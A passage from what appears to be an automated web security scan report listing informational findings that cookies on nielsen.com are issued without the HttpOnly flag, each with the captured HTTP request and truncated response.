Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/topnav/navGround.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:32 GMT
ETag: "be8053-751-4ad7c1a155c00"
Accept-Ranges: bytes
Content-Length: 1873
Content-Type: image/gif

GIF89a..*...............................................................................................................................................................................................
...[SNIP]...

4.42. http://nielsen.com/etc/designs/corporate/images/topnav/navNormal.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/topnav/navNormal.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/topnav/navNormal.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:35 GMT
ETag: "e78094-21a-4ad7b8ec991c0"
Accept-Ranges: bytes
Content-Length: 538
Content-Type: image/gif

GIF89a<.*...............................................................................................................................................................................................
...[SNIP]...

4.43. http://nielsen.com/etc/designs/corporate/nielsencustom.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/nielsencustom.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/nielsencustom.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:39 GMT
ETag: "be8085-569e-4ad7c1a802bc0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 22174


/******************************************************************************/
/* nielsencustom.css (strip down version,
removed some common style to prevent overridden CQ 5.3 style)
/*********
...[SNIP]...

4.44. http://nielsen.com/etc/designs/corporate/pagelayout.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/pagelayout.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/pagelayout.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:12 GMT
ETag: "e78069-a60-4ad7b8d6a9e00"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 2656


/******************************************************************************/
/* page layouts CQ 5.3
/******************************************************************************/
body.n-bod
...[SNIP]...

4.45. http://nielsen.com/etc/designs/corporate/reset.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/reset.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/reset.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:59 GMT
ETag: "e78060-573-4ad7b8ca440c0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 1395

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.7.0
*/
/**
* YUI Reset
* @module reset
* @namespac
...[SNIP]...

4.46. http://nielsen.com/etc/designs/corporate/static.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:39 GMT
ETag: "be8082-b3-4ad7c1a802bc0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 179

@import url("reset.css");
@import url("nielsencustom.css");
@import url("pagelayout.css");
@import url("topnav.css");
@import url("additions.css");
@import url("cq.css");


4.47. http://nielsen.com/etc/designs/corporate/static/js/autocomp/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static/js/autocomp/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static/js/autocomp/jquery-1.3.2.min.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:30 GMT
ETag: "be8042-dfa7-4ad7c19f6d780"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 57255

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

4.48. http://nielsen.com/etc/designs/corporate/static/js/autocomp/jquery.autocomplete-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static/js/autocomp/jquery.autocomplete-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static/js/autocomp/jquery.autocomplete-min.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be8069-4829-4ad7c1a526500"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 18473

jQuery.autocomplete = function(input, options) {
// Create a link to self
var me = this;

// Create jQuery object for input element
var $input = $(input).attr("autocomplete", "off");


...[SNIP]...

4.49. http://nielsen.com/etc/designs/corporate/static/js/horzNav.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static/js/horzNav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static/js/horzNav.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:35 GMT
ETag: "e78093-e37-4ad7b8ec991c0"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 3639

/*
* This javascript function is to build the top navigation component
* on the page.
* The dropdownmenu function creates the second level dropdown menu option
* The showhide function is used to
...[SNIP]...

4.50. http://nielsen.com/etc/designs/corporate/static/js/nielsenJs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static/js/nielsenJs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static/js/nielsenJs.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e7803e-b69-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 2921

function addLoadEvent(func) {
var oldonload = window.onload;
if (typeof window.onload != 'function') {
window.onload = func;
} else {
window.onload = function()
...[SNIP]...

4.51. http://nielsen.com/etc/designs/corporate/topnav.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/topnav.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/topnav.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:52 GMT
ETag: "e78025-b3b-4ad7b8c397100"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 2875


/******************************************************************************/
/* topnav
/******************************************************************************/
#nav {
background: url
...[SNIP]...

4.52. http://nielsen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: nielsen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 404 Not Found
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:19:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 28976


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8
...[SNIP]...

4.53. http://nielsen.com/libs/cq/personalization/components/clickstreamcloud/content/config.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /libs/cq/personalization/components/clickstreamcloud/content/config.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /libs/cq/personalization/components/clickstreamcloud/content/config.json?path=%2Fus%2Fen%2Fmeasurement%2Fonline-measurement&cq_ck=1316711871094 HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Length: 2107
Content-Type: application/json;charset=utf-8

{
"data": {
"profile": {
"avatar": "/etc/designs/default/images/collab/avatar.png",
"authorizableId": "anonymous",
"authorizableId_xss": "anonymous",
"formattedName": "",
...[SNIP]...

4.54. http://nielsen.com/us/en/insights/press-room/2008/nielsen_reports_tv.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/insights/press-room/2008/nielsen_reports_tv.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/en/insights/press-room/2008/nielsen_reports_tv.html HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/content/corporate/us/en/search.html?q=mobile+tv+internet
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.4.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3Dmobile%20tv%20internet%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7CTAGCLOUD%3A%3D%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3937166166; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Accept-Ranges: bytes
Content-Type: text/html
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 49622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.55. http://nielsen.com/us/en/measurement/online-measurement.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/measurement/online-measurement.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/en/measurement/online-measurement.html HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nielsen-online.com/intlpage.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Accept-Ranges: bytes
Content-Type: text/html
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 53496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.56. http://nielsen.com/us/en/measurement/television-measurement.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/measurement/television-measurement.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/en/measurement/television-measurement.html HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Accept-Ranges: bytes
Content-Type: text/html
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 50327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.57. http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/practices/cross-platform-audience-behavior.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/en/practices/cross-platform-audience-behavior.html HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/measurement/television-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.2.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Accept-Ranges: bytes
Content-Type: text/html
X-Pad: avoid browser bug
Vary: Accept-Encoding
Content-Length: 50463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.58. http://sales.liveperson.net/hc/9551721/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/9551721/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

